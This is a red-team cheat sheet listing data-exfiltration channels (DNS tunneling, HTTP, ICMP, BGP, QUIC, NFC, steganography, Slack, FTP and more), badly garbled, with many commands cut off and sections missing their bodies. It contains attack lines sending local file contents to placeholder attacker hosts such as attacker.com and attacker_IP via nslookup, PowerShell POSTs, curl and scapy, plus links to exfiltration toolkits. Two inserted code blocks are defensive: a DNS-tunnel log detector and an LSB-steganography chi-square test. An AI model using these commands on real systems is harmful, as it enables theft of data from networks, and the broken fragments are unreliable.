Exfiltration Method For Channels
RedTeamRecipe
Red Team Recipe for Fun & Profit.
DNS Tunneling
1. Using nslookup on Linux/macOS:
nslookup SensitiveData.attacker.com
[System.Net.Dns]::GetHostAddresses("SensitiveData.attacker.com") | ForEach-Object { $_.ToString() }
This invocation sends 45 bytes per subdomain label, with 4 such labels in each query, and reserves 15 bytes at the end for the filename.
python dnsteal.py 127.0.0.1 -z -v -b 45 -s 4 -f 15
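Detection-side counterpart to the dnsteal layout above, as an added example that is not taken from the original page or from the dnsteal project: a small Python analyser that scores DNS query logs for the indicators a chunked transfer leaves behind (labels far longer than ordinary hostnames, a long high-entropy subdomain, and many distinct subdomains under one zone from one client). The log format, the client addresses, the `attacker.example` zone and the thresholds are constructed assumptions; the tunnel lines are generated to match the 45-byte labels, 4 labels per query and 15-byte filename label described above.

```python
import math
import random
from collections import defaultdict

# Constructed sample DNS query log (hypothetical format: "<epoch> <client> <qname> <qtype>").
# The tunnel lines mimic the dnsteal layout above: four 45-byte base64-like labels,
# a 15-byte filename label, then the attacker-controlled zone (placeholder name).
_rng = random.Random(7)
_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"


def _chunk(n):
    return "".join(_rng.choice(_ALPHABET) for _ in range(n))


BENIGN_LINES = [
    "1700000000 10.0.0.5 www.example.com A",
    "1700000001 10.0.0.5 mail.example.com MX",
    "1700000002 10.0.0.5 cdn-assets.static.example.net A",
    "1700000003 10.0.0.9 login.microsoftonline.com A",
]
TUNNEL_LINES = [
    "17000000%02d 10.0.0.7 %s.%s.%s.%s.%s.attacker.example A"
    % (i, _chunk(45), _chunk(45), _chunk(45), _chunk(45), _chunk(15))
    for i in range(10, 35)
]
SAMPLE_LOG = "\n".join(BENIGN_LINES + TUNNEL_LINES)


def shannon_entropy(text):
    """Bits per character of the string; random base64 data scores far above hostnames."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """Split a query name into (subdomain, zone). The zone is approximated as the
    last two labels; a production detector would use the Public Suffix List."""
    labels = [l for l in qname.rstrip(".").split(".") if l]
    if len(labels) < 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def score_query(qname, long_label=40, long_subdomain=100, min_entropy=4.0):
    """Per-query indicators of encoded data in the name. Returns (subdomain, zone, reasons)."""
    sub, zone = split_qname(qname)
    labels = [l for l in sub.split(".") if l]
    reasons = []
    if any(len(l) > long_label for l in labels):
        reasons.append("long_label")
    if len(sub) > long_subdomain:
        reasons.append("long_subdomain")
    if shannon_entropy(sub.replace(".", "")) > min_entropy:
        reasons.append("high_entropy")
    return sub, zone, reasons


def analyze(log_text, unique_threshold=20):
    """Aggregate per (client, zone): the per-query indicators plus a volume indicator
    (many distinct subdomains under one zone, as a chunked file transfer produces).
    Returns {(client, zone): sorted reasons} for pairs with at least one reason."""
    unique_subs = defaultdict(set)
    reasons_by_pair = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines
        _ts, client, qname, _qtype = parts[:4]
        sub, zone, reasons = score_query(qname)
        unique_subs[(client, zone)].add(sub)
        reasons_by_pair[(client, zone)].update(reasons)
    alerts = {}
    for key, subs in unique_subs.items():
        reasons = set(reasons_by_pair[key])
        if len(subs) >= unique_threshold:
            reasons.add("many_unique_subdomains")
        if reasons:
            alerts[key] = sorted(reasons)
    return alerts


if __name__ == "__main__":
    for (client, zone), reasons in analyze(SAMPLE_LOG).items():
        print("%s -> %s: %s" % (client, zone, ", ".join(reasons)))
```

The thresholds are starting points, and the combination of reasons matters more than any single one: CDN, anti-spam and telemetry hostnames also produce long or high-entropy labels, so the volume indicator per (client, zone) is what separates a transfer from a handful of odd lookups. Replace the last-two-labels zone approximation with Public Suffix List handling before running this over real resolver logs.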
$encodedData = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\path\to\fil
Invoke-RestMethod -Uri "http://attacker.com/exfil" -Method POST -Body "data=$encodedData"
Covert Channels
1. Using steghide on Linux to embed data in an image:
java -jar OpenStego.jar embed -a LSB -mf image.png -cf cover.png -ef secret.txt -p password
Cloud Storage
1. Using AWS CLI to upload a file to S3:
Remote Desktop
1. Using xfreerdp on Linux to copy a file from the remote machine:
SSH Tunneling
1. Using scp on Linux/macOS to copy a file through SSH tunneling:
1. Using an online QR code generator: Many online tools allow you to create QR
codes by inputting text. You can copy the generated QR code image.
https://github.com/Shell-Company/QRExfil
Voice Exfiltration
1. Using sox on Linux to convert a text file to speech:
Printer Watermarking
1. Using pdftk on Linux to add a watermark to a PDF file:
1. Using online tools: There are online tools that allow you to upload a PDF and
add a watermark. Search for “online PDF watermarking tool” to find suitable
options.
nfc-send /path/to/local/file.txt
Open the file you want to share, then tap the devices together to initiate NFC data transfer.
1. Using third-party apps on mobile devices: There are various apps available
on app stores that allow you to send files through NFC. Search for “NFC file
transfer” apps suitable for your platform.
scrot screenshot.png
screencapture screenshot.png
cp /path/to/local/file.txt /media/usb-drive/
IPFS
1. Using IPFS and Ethereum Smart Contract:
1. Using ipfs command-line tool to add a file to IPFS and store hash on
Ethereum:
LNK Data
lnkup.py --host localhost --type ntlm --output out.lnk
WebSocket
exfiltrate websocket /path/to/local/file.txt
All-in-One
1. Using exfiltrate via DNS:
https://github.com/s0i37/exfiltrate
Encrypted All-in-One
1. Using CloakifyFactory to exfiltrate data using DNS covert channel:
https://github.com/TryCatchHCF/Cloakify
DLP failures
1. Using DET to exfiltrate data via DNS requests:
/path/to/local/file.txt
text-based steganography
1. Using PacketWhisper to exfiltrate data via ICMP covert channel:
[attacker_IP]
[attacker_domain]
http://attacker.com/upload
/path/to/local/file.txt -a [attacker_IP]
-d [attacker_domain]
/path/to/local/file.txt -u http://attacker.com/upload
-d [attacker_domain]
-u http://attacker.com/upload
NC Based
1. Using sg1 to exfiltrate data via ICMP covert channel:
[username] -p [password]
[username] -p [password]
exfiltration/infiltration toolkit
1. Infiltration (File upload)
1. Dns-to-Tcp WIP
1. Dns-Shellcode
cl /c lib\qrcodegen.c
cl /c qr_upload.c
link /out:qr_upload.exe qr_upload.obj qrcodegen.obj
chcp 866
set TIMEOUT=1000
set SIZE=100
qr_upload.exe c:\path\to\secret.bin

gcc -c lib/qrcodegen.c
gcc -c qr_upload.c
gcc qr_upload.c qrcodegen.o -o qr_upload
setterm -background white
setterm -foreground black
TIMEOUT=1000 SIZE=100 ./qr_upload /path/to/secret.bin
setxkbmap us
cat /tmp/test.txt | ./text_send.sh
cat /tmp/test.bin | base64 | ./text_send.sh
Atmega 32u4/ESP8266
Commenting code:
- “Rem: Comment”
- Set comments
https://github.com/exploitagency/ESPloitV2
exfil.log
encrypted.log
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet -o
exfil.log
my_custom_agent" -o user_agent.log
HTTP Cookie
1. Using cURL on Linux/macOS to send data as a cookie:
http://attacker.com
Content 'C:\path\to\local\file.txt')"}
https://github.com/ytisf/PyExfil
NTP Body
1. Using ntpdate on Linux to send data in NTP packet body:
BGP Open
1. Using Python to send data in BGP Open message fields:
send(IP(dst='attacker_IP')/TCP(dport=179)/BGPHeader(marker=0xffffffffffffffff,msg_len=32)/BGPOpen(version=4,asn=65535,hold_time=180, id='0.0.0.0', params='/path/to/local/file.txt'))"
1. Using hping3 to send data in BGP Open message fields:
--flood -V attacker_IP
send(IP(dst='attacker_IP')/TCP(dport=179)/BGPHeader(marker=0xffffffffffffffff,msg_len=32)/BGPOpen(version=4,asn=65535,hold_time=180, id='0.0.0.0', params='/mnt/c/path/to/local/file.txt'))"
After launching, configure the client to use the proxy and accept the custom
certificate.
1. Using Fiddler to intercept HTTPS traffic and replace the certificate: Install
Fiddler, enable HTTPS decryption, and import your certificate for the target
domain.
QUIC - No Certificate
1. Using scapy in Python to send QUIC packets without encryption:
send(IP(dst='attacker_IP')/UDP(sport=12345, dport=443)/Raw(load='GET /path/to/local/file.txt'))"
-V attacker_IP
Slack Exfiltration
1. Using Slack API to send a message with data:
curl -X POST -H "Authorization: Bearer YOUR_SLACK_TOKEN" -H "Content-Type:
/path/to/local/file.txt)"}' https://slack.com/api/chat.postMessage
POP3 Authentication
1. Using Python’s smtplib to send an email via POP3 authentication:
'your_password'); server.sendmail('from_email@example.com',
/path/to/local/file.txt)'); server.quit()"
"/path/to/local/file.txt" -u "your_email@example.com:your_password"
1. Using Python with smtplib on Windows Subsystem for Linux (WSL) to send
an email via POP3 authentication:
'your_password'); server.sendmail('from_email@example.com',
/mnt/c/path/to/local/file.txt)'); server.quit()"
FTP MKDIR
1. Using curl to create directories with encoded data in the FTP server:
1. Using wget to create directories with encoded data in the FTP server:
base64)"
1. Using Python to create directories with encoded data in the FTP server:
dst='[destination_IP]')/Raw(load='$(cat /path/to/local/file.txt)'))"
[destination_IP]
HTTP Response
1. Using curl to send data in an HTTP response header:
http://attacker.com
%1
/tmp/response.txt
MAP_Draft
NTP Request
1. Using ntpdate on Linux to send data in NTP packet requests:
echo -n "$(cat /path/to/local/file.txt)" | xxd -p | sed 's/\(..\)/\1 /g' |
('224.0.0.252', 5355))"
[DropBox_LSP_server_IP]
('[DropBox_LSP_server_IP]', 5355))"
/path/to/local/file.txt).example.com"
[target_IP] -r {} -s [sender_IP]
sendp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op=1, psrc='[spoofed_source_IP]', hwtype=0x1)/Raw(load='$(cat /path/to/local/file.txt)'))"
JetDirect
1. Using netcat (nc) to send data as a print job to a JetDirect printer:
"@/path/to/local/file.txt" "https://attacker.com"
https://attacker.com:4433
MDNS Query
1. Using avahi-resolve on Linux to send data in mDNS queries:
{}.$(cat /path/to/local/file.txt)" -4
/path/to/local/file.txt)"
{}.$(cat /path/to/local/file.txt)"
AllJoyn
1. Using aj_send tool to send data over AllJoyn:
/path/to/local/file.txt)
1. Using Python with the alljoyn library to send data over AllJoyn:
service = aj.create_service('org.example.ExfiltrationService');
aj.register_interface(iface); service.setup()"
$(cat /path/to/local/file.txt)
DNSQ
1. Using dig to send data in DNS queries:
play output.wav
WiFi - On Payload
1. Using Scapy in Python to send data via WiFi frames:
addr1='[destination_MAC]', addr2='[source_MAC]', addr3='[destination_MAC]')/Raw(load='$(cat /path/to/local/file.txt)'), iface='wlan0')"
{}
MAC_HEADER_CAPTURE.pcap
3.5mm Jack
1. Using play from sox to transmit audio through the 3.5mm jack:
signed -B -q -
Install a tone generator app on your smartphone, load the file, and play it
Binary Offset
1. Using xxd to encode data as binary and print specific offsets:
"0x{} "
File.read("/path/to/transcript.txt")})'
python -c "braille_dict = {'a': '⠁', 'b': '⠃', 'c': '⠉', 'd': '⠙', 'e': '⠑',
'f': '⠋', 'g': '⠛', 'h': '⠓', 'i': '⠊', 'j': '⠚'}; text =
print(braille_text)"
1. Using sed and Unicode Braille characters to convert a text file into Braille:
awk '{gsub(/./,"& "); for (i=1; i<=NF; i++) { if ($i == "a") $i="⠁"; else if ($i == "b") $i="⠃"; else if ($i == "c") $i="⠉"; else if ($i == "d") $i="⠙"; else if ($i == "e") $i="⠑"; else if ($i == "f") $i="⠋"; else if ($i == "g") $i="⠛"; else if ($i == "h") $i="⠓"; else if ($i == "i") $i="⠊"; else if ($i
PNG Transparency
1. Using steghide to embed data in the alpha channel of a PNG image:
1. Using zsteg to extract data from the alpha channel of a PNG image:
1. Using zsteg to extract data from the least significant bits of an image:
1. Using Python with the PIL library to embed data in the least significant bits
of an image:
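As an added example (not the page's own PIL snippet, which is absent here): the least-significant-bit embedding this item describes, implemented over a raw byte buffer that stands in for one colour channel, paired with the check a defender runs against such an image, the pairs-of-values chi-square test of Westfeld and Pfitzmann. The cover buffer, its histogram skew and the payload are constructed, and the function names are assumptions of this example.

```python
import random


def embed_lsb(cover, payload):
    """Write payload bits, MSB first, into the least significant bit of successive
    cover bytes. Used here only to build the constructed stego sample."""
    bits = [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("payload does not fit in cover")
    out = bytearray(cover)
    for pos, bit in enumerate(bits):
        out[pos] = (out[pos] & 0xFE) | bit
    return bytes(out)


def extract_lsb(stego, nbytes):
    """Inverse of embed_lsb: reassemble nbytes from the LSBs."""
    out = bytearray()
    for i in range(nbytes):
        value = 0
        for bit_pos in range(8):
            value = (value << 1) | (stego[i * 8 + bit_pos] & 1)
        out.append(value)
    return bytes(out)


def chi_square_pairs(samples):
    """Westfeld-Pfitzmann pairs-of-values statistic. Natural histograms have unequal
    counts for the values 2k and 2k+1; embedding random-looking data in the LSBs pushes
    each pair toward equality, so the statistic collapses toward the degrees of freedom.
    Returns (statistic, degrees_of_freedom)."""
    hist = [0] * 256
    for v in samples:
        hist[v] += 1
    stat, dof = 0.0, 0
    for k in range(128):
        even, odd = hist[2 * k], hist[2 * k + 1]
        expected = (even + odd) / 2.0
        if expected == 0:
            continue
        stat += (even - expected) ** 2 / expected + (odd - expected) ** 2 / expected
        dof += 1
    return stat, dof


def looks_embedded(samples, ratio=2.0):
    """Flag when the statistic is within `ratio` times the degrees of freedom."""
    stat, dof = chi_square_pairs(samples)
    return stat < ratio * dof


def make_cover(n=8192, seed=1, odd_fraction=0.15):
    """Constructed stand-in for one colour channel: values are drawn so the odd member
    of each (2k, 2k+1) pair is rarer, the kind of skew real image histograms show."""
    rng = random.Random(seed)
    buf = bytearray()
    for _ in range(n):
        pair = rng.randrange(128) * 2
        buf.append(pair + (1 if rng.random() < odd_fraction else 0))
    return bytes(buf)


def make_payload(nbytes, seed=2):
    """Constructed random-looking payload (what compressed or encrypted data looks like)."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(nbytes))


if __name__ == "__main__":
    cover = make_cover()
    stego = embed_lsb(cover, make_payload(len(cover) // 8))
    for name, buf in (("cover", cover), ("stego", stego)):
        stat, dof = chi_square_pairs(buf)
        print("%s: chi2=%.1f dof=%d embedded=%s" % (name, stat, dof, looks_embedded(buf)))
```

On a real PNG the same statistic is fed one channel's pixel values (for instance from Pillow's `Image.getdata()` after `split()`). The test is strong against sequential embedding that fills the image from the start, which is what a naive script does; embeddings that scatter bits or use only part of the image need the test applied over sliding windows, and pure steghide-style JPEG embedding needs a different statistic.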